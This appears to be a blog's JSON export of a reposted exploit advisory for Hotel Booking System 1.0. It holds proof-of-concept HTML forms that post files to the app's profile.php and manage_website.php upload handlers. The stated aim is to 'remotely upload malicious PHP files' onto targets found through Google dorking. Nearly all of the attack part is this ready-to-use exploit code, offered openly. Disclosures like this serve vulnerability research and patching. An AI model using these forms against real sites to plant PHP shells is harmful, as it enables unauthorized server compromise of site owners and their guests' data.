{"id":58955,"date":"2024-08-16T21:10:28","date_gmt":"2024-08-16T18:10:28","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180178\/hbs10-shell.txt"},"modified":"2024-08-16T21:10:28","modified_gmt":"2024-08-16T18:10:28","slug":"hotel-booking-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hotel-booking-system-1-0-shell-upload\/","title":{"rendered":"Hotel Booking System 1.0 Shell Upload"},"content":{"rendered":"

=============================================================================================================================================
| # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/hotel.zip |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This HTML page is designed to remotely upload malicious PHP files directly.<\/p>\n[+] Line 9 set url of target.<\/p>\n[+] The path to upload the files : http:\/\/127.0.0.1\/hotel\/uploadImage\\Profile<\/p>\n[+] Save Code as html :<\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Image Upload Form<\/title>
<\/head>
<body>
<form action=”http:\/\/127.0.0.1\/source%20code\/profile.php” method=”POST” enctype=”multipart\/form-data”>
<label for=”image”>Upload an image:<\/label>
<input type=”file” id=”image” name=”image” accept=”image\/*” required>
<button type=”submit” name=”btn_update”>Upload<\/button>
<\/form>
<\/body>
<\/html><\/p>\n[+] part 2 : infected item ( manage_website.php ) .<\/p>\n[+] Line 9 set url of target.<\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Update Website Images<\/title>
<\/head>
<body>
<form action=”http:\/\/127.0.0.1\/source%20code\/manage_website.php” method=”POST” enctype=”multipart\/form-data”>
<input type=”hidden” name=”old_website_image” value=”current_website_image.jpg”>
<label for=”website_image”>Upload new website image:<\/label>
<input type=”file” id=”website_image” name=”website_image” accept=”image\/*”><\/p>\n

<input type=”hidden” name=”old_login_image” value=”current_login_image.jpg”>
<label for=”login_image”>Upload new login image:<\/label>
<input type=”file” id=”login_image” name=”login_image” accept=”image\/*”><\/p>\n

<input type=”hidden” name=”old_back_login_image” value=”current_back_login_image.jpg”>
<label for=”back_login_image”>Upload new back login image:<\/label>
<input type=”file” id=”back_login_image” name=”back_login_image” accept=”image\/*”><\/p>\n

<button type=”submit” name=”btn_web”>Update Images<\/button>
<\/form>
<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/hotel.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This HTML page is designed …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58955","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58955","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58955"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58955\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58955"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58955"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58955"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}